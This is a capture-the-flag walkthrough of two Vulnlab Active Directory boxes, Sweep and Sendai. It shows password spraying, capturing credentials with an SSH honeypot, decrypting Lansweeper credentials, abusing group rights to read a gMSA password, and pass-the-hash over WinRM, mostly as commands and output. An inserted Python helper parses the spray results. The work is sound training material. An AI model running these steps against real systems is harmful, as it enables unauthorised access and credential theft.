SMB         10.10.80.128    445    INVENTORY        C$                              Default share
SMB         10.10.80.128    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.80.128    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.80.128    445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.80.128    445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.80.128    445    INVENTORY        SYSVOL                          Logon server share 
SMB         10.10.80.128    445    INVENTORY        [+] Brute forcing RIDs
SMB         10.10.80.128    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

Make a user list and spray it with username=password:

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
crackmapexec smb sweep.vl -u users.txt -p users.txt --shares --continue-on-success

Bloodhound Enum

┌──(puck㉿kali)-[~/vulnlab/sweep]
bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.80.128 -u intern -p intern --zip    
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 06S
INFO: Compressing output into 20240617132345_bloodhound.zip

Log in to the web interface as user intern on http://sweep.vl:81/, go to Scanning -> Scanning credentials (note that saved creds are in use), then go to Scanning -> Scanning targets -> add an IP range target covering the vulnlab VPN IP, and use the saved creds.

Then on the Kali machine run an SSH honeypot. I used sshesame; the only thing that needs changing is the sshesame.yaml file, setting listen_address: 10.8.2.138:22 (in my case):

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ ./sshesame-linux-amd64 --config sshesame.yaml
INFO 2024/06/17 14:52:02 No host keys configured, using keys at "/home/puck/.local/share/sshesame"
INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22
WARNING 2024/06/17 14:53:40 Failed to accept connection: Failed to establish SSH server connection: EOF
WARNING 2024/06/17 14:53:46 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "0|5<REDACTED>" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected

Now log on to http://sweep.vl:81/Default.aspx as user svc_inventory_lnx

and do your thing with more privileges,

or the simpler way, after adding svc_inventory_lnx to the "Lansweeper Admins" group.

Unintended way: https://github.com/Yeeb1/SharpLansweeperDecrypt

But first, as BloodHound suggests:

Full control of a group allows you to directly modify group membership of the group.

Use samba’s net tool to add the user to the target group. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line:

┌──(puck㉿kali)-[~/vulnlab/sweep]
net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl
Password for [SWEEP\svc_inventory_lnx]:

Then WinRM to the box:

┌──(puck㉿kali)-[~/vulnlab/sweep]
evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p '0|5<REDACTED>' 

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\temp> upload LansweeperDecrypt.ps1
                                        
Info: Uploading /home/puck/vulnlab/sweep/LansweeperDecrypt.ps1 to C:\temp\LansweeperDecrypt.ps1
                                        
Data: 5700 bytes of 5700 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> ./LansweeperDecrypt.ps1
[+] Loading web.config file...
[+] Found protected connectionStrings section. Decrypting...
[+] Decrypted connectionStrings section:
<connectionStrings>
    <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk<REDACTED>;Connect Timeout=10;Application Name=&quot;LsService Core .Net SqlClient Data Provider&quot;" providerName="System.Data.SqlClient" />
</connectionStrings>
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Decrypting password for user: SNMP Community String
[+] Decrypting password for user:
[+] Decrypting password for user: SWEEP\svc_inventory_win
[+] Decrypting password for user: svc_inventory_lnx
[+] Credentials retrieved and decrypted successfully:

CredName          Username                Password
--------          --------                --------
SNMP-Private      SNMP Community String   private
Global SNMP                               public
Inventory Windows SWEEP\svc_inventory_win 4^5<REDACTED>
Inventory Linux   svc_inventory_lnx       0|5<REDACTED>

Then WinRM to the box as svc_inventory_win (an admin):

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ evil-winrm -i sweep.vl -u 'SWEEP\svc_inventory_win' -p '4^5<REDACTED>'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_win\Documents>

vulnlab-sendai

vulnlab sendai

A medium Windows machine

enum

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --users --shares 
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Enumerated shares
SMB         dc.sendai.vl    445    DC               Share           Permissions     Remark
SMB         dc.sendai.vl    445    DC               -----           -----------     ------
SMB         dc.sendai.vl    445    DC               ADMIN$                          Remote Admin
SMB         dc.sendai.vl    445    DC               C$                              Default share
SMB         dc.sendai.vl    445    DC               config                          
SMB         dc.sendai.vl    445    DC               IPC$            READ            Remote IPC
SMB         dc.sendai.vl    445    DC               NETLOGON                        Logon server share 
SMB         dc.sendai.vl    445    DC               sendai          READ            company share
SMB         dc.sendai.vl    445    DC               SYSVOL                          Logon server share 
SMB         dc.sendai.vl    445    DC               Users           READ            
SMB         dc.sendai.vl    445    DC               [-] Error enumerating domain users using dc ip dc.sendai.vl: NTLM needs domain\username and a password
SMB         dc.sendai.vl    445    DC               [*] Trying with SAMRPC protocol

.

RID brute force

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u 'puck' -p '' --rid-brute 10000
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\puck: 
SMB         dc.sendai.vl    445    DC               [+] Brute forcing RIDs
SMB         dc.sendai.vl    445    DC               498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               500: SENDAI\Administrator (SidTypeUser)
SMB         dc.sendai.vl    445    DC               501: SENDAI\Guest (SidTypeUser)
SMB         dc.sendai.vl    445    DC               502: SENDAI\krbtgt (SidTypeUser)
SMB         dc.sendai.vl    445    DC               512: SENDAI\Domain Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               513: SENDAI\Domain Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               514: SENDAI\Domain Guests (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               515: SENDAI\Domain Computers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               516: SENDAI\Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               517: SENDAI\Cert Publishers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               518: SENDAI\Schema Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               525: SENDAI\Protected Users (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               526: SENDAI\Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1000: SENDAI\DC$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB         dc.sendai.vl    445    DC               1104: SENDAI\sqlsvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1105: SENDAI\websvc (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1107: SENDAI\staff (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1112: SENDAI\Susan.Harper (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1117: SENDAI\Jason.Brady (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1128: SENDAI\ca-operators (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1129: SENDAI\admsvc (SidTypeGroup)
SMB         dc.sendai.vl    445    DC               1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB         dc.sendai.vl    445    DC               1131: SENDAI\support (SidTypeGroup)
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt

Check for accounts whose password must be changed by spraying an empty password against the user list:

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec smb sendai.vl -u users.txt -p '' --continue-on-success
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Guest: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\krbtgt: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Domain: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cert: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Schema: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Group: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Read-only: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Cloneable: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Protected: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Key: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Enterprise: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\RAS: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Allowed: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\Denied: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\DC$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsAdmins: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\DnsUpdateProxy: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\SQLServer2005SQLBrowserUser$DC: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\sqlsvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\websvc: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\staff: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Dorothy.Jones: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kerry.Robinson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Naomi.Gardner: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Anthony.Smith: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Susan.Harper: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Stephen.Simpson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Marie.Gallagher: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Kathleen.Kelly: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Norman.Baxter: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Jason.Brady: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Malcolm.Smith: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lisa.Williams: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Ross.Sullivan: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Clifford.Davey: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Declan.Jenkins: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Lawrence.Grant: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Leslie.Johnson: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Megan.Edwards: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\ca-operators: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\admsvc: 
SMB         dc.sendai.vl    445    DC               [-] sendai.vl\mgtsvc$: STATUS_LOGON_FAILURE 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\support: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
SMB         dc.sendai.vl    445    DC               [+] sendai.vl\: 
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]
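Added example, not part of the writeup: a small Python parser for the two crackmapexec outputs above. The cut/awk one-liner used above keeps only the first word of each principal, which is why names like "Domain" and "Cert" end up in the spray and come back as [+]; most likely the DC, with Guest enabled (it also shows as [+]), treats an unknown name with an empty password as a guest logon rather than a working credential. The parser below keeps full names, separates SidTypeUser entries from groups, and cross-checks the spray results against the RID list so only real accounts with an empty password or STATUS_PASSWORD_MUST_CHANGE are reported. The sample lines are constructed to match the format shown above.

```python
import re

# Constructed sample of `crackmapexec smb ... --rid-brute` output (same line format as the
# writeup's, a handful of the principals).
RID_BRUTE_OUTPUT = """\
SMB  dc.sendai.vl  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB  dc.sendai.vl  445  DC  [+] Brute forcing RIDs
SMB  dc.sendai.vl  445  DC  498: SENDAI\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  500: SENDAI\\Administrator (SidTypeUser)
SMB  dc.sendai.vl  445  DC  501: SENDAI\\Guest (SidTypeUser)
SMB  dc.sendai.vl  445  DC  512: SENDAI\\Domain Admins (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  1000: SENDAI\\DC$ (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1118: SENDAI\\Elliot.Yates (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1127: SENDAI\\Thomas.Powell (SidTypeUser)
SMB  dc.sendai.vl  445  DC  1129: SENDAI\\admsvc (SidTypeGroup)
SMB  dc.sendai.vl  445  DC  1130: SENDAI\\mgtsvc$ (SidTypeUser)
"""

# Constructed sample of the empty-password spray output (same format as the writeup's).
AUTH_OUTPUT = """\
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\\Administrator: STATUS_LOGON_FAILURE
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\\Guest:
SMB  dc.sendai.vl  445  DC  [+] sendai.vl\\Domain:
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE
SMB  dc.sendai.vl  445  DC  [-] sendai.vl\\mgtsvc$: STATUS_LOGON_FAILURE
"""

RID_LINE = re.compile(r"(?P<rid>\d+): (?P<domain>[^\\]+)\\(?P<name>.+?) \((?P<type>SidType\w+)\)\s*$")
AUTH_LINE = re.compile(r"\[(?P<mark>[+-])\] (?P<domain>[^\\\s]+)\\(?P<name>[^:]*):\s*(?P<status>\S*)")


def parse_rid_brute(text):
    """Map each resolved principal's full name (spaces included) to (RID, SID type)."""
    principals = {}
    for line in text.splitlines():
        m = RID_LINE.search(line)
        if m:
            principals[m["name"]] = (int(m["rid"]), m["type"])
    return principals


def user_accounts(principals, include_machines=False):
    """SidTypeUser names only; machine accounts (trailing $) are dropped unless requested."""
    names = [n for n, (_, kind) in principals.items() if kind == "SidTypeUser"]
    if not include_machines:
        names = [n for n in names if not n.endswith("$")]
    return sorted(names, key=str.lower)


def parse_auth_results(text):
    """Map account name to NTSTATUS; a [+] line with no status means the password was accepted."""
    results = {}
    for line in text.splitlines():
        m = AUTH_LINE.search(line)
        if m:
            results[m["name"]] = m["status"] or ("SUCCESS" if m["mark"] == "+" else "UNKNOWN")
    return results


def triage(principals, results):
    """Keep only results worth acting on, cross-checked against the RID list."""
    findings = {}
    for name, status in results.items():
        is_user = principals.get(name, (None, None))[1] == "SidTypeUser"
        if status == "STATUS_PASSWORD_MUST_CHANGE":
            findings[name] = "password expired (account can still set a new one)"
        elif status == "SUCCESS" and is_user:
            findings[name] = "empty password accepted"
        elif status == "SUCCESS":
            # Name is not a user on the DC: a [+] here is the guest fallback, not a credential.
            findings[name] = "guest fallback for unknown name"
    return findings
```

Feed it the real files (`parse_rid_brute(open("allusers.txt").read())`) and the spray output to get a user list without the truncated group names, and a findings dict that ignores the guest-fallback noise.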

.

Change the expired password over SMB

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$  impacket-smbpasswd -newpass Passw0rd@ 'Elliot.Yates':@sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

Current SMB password: 
[!] Password is expired, trying to bind with a null session.
[*] Password was changed successfully.
                                                                                   
┌──(puck㉿kali)-[~/vulnlab/sendai]

Enumerating some more

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ impacket-smbclient sendai.vl/'Elliot.Yates':'Passw0rd@'sendai.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Type help for list of commands
# shares
ADMIN$
C$
config
IPC$
NETLOGON
sendai
SYSVOL
Users
# use config
# ls
drw-rw-rw-          0  Thu Jun 13 13:22:52 2024 .
drw-rw-rw-          0  Wed Jul 19 10:11:25 2023 ..
-rw-rw-rw-         78  Tue Jul 11 08:57:10 2023 .sqlconfig
# get .sqlconfig

---
┌──(puck㉿kali)-[~/vulnhlab/sendai]
└─$ cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=Su<REDACTED>85;
---

┌──(puck㉿kali)-[~/vulnhub/sendai]
└─$ bloodhound-python -u sqlsvc -p Su<REDACTED>85 -d sendai.vl -c all -dc dc.sendai.vl -ns 10.10.69.199  
INFO: Found AD domain: sendai.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.sendai.vl
INFO: Found 27 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 5 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.sendai.vl
INFO: Done in 00M 09S

Import the collected data into BloodHound.

We have GenericAll on the ADMSVC group, and ADMSVC@sendai.vl can read the gMSA password of mgtsvc$.

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ net rpc group addmem "ADMSVC" Elliot.Yates -U sendai.vl/Elliot.Yates -S sendai.vl
Password for [SENDAI.VL\Elliot.Yates]:Passw0rd@
┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec ldap sendai.vl -u Elliot.Yates -p Passw0rd@ --gmsa
SMB         dc.sendai.vl    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
LDAP        dc.sendai.vl    636    DC               [+] sendai.vl\Elliot.Yates:Passw0rd@ 
LDAP        dc.sendai.vl    636    DC               [*] Getting GMSA Passwords
LDAP        dc.sendai.vl    636    DC               Account: mgtsvc$              NTLM: 57<REDACTED>11
                                                                                   

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ crackmapexec winrm sendai.vl -u 'mgtsvc$' -H 57ae3a74ca9345ae52fadc29f178ad11

SMB         dc.sendai.vl    5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
HTTP        dc.sendai.vl    5985   DC               [*] http://dc.sendai.vl:5985/wsman
WINRM       dc.sendai.vl    5985   DC               [+] sendai.vl\mgtsvc$:57<REDACTED>11 (Pwn3d!)

Evil-WinRM into the box and run PrivescCheck.ps1

┌──(puck㉿kali)-[~/vulnlab/sendai]
└─$ evil-winrm -i sendai.vl -u 'mgtsvc$' -H 57<REDACTED>11 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> 
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cat c:\user.txt
VL{e01<REDACTED>62}

*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> mkdir c:\temp


    Directory: C:\


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         6/14/2024   1:04 AM                temp


*Evil-WinRM* PS C:\Users\mgtsvc$\Documents> cd c:\temp
*Evil-WinRM* PS C:\temp> upload PrivescCheck.ps1
                                        
Info: Uploading /home/puck/vulnlab/sendai/PrivescCheck.ps1 to C:\temp\PrivescCheck.ps1
                                        
Data: 394496 bytes of 394496 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> 
*Evil-WinRM* PS C:\temp>  . .\PrivescCheck.ps1; Invoke-PrivescCheck
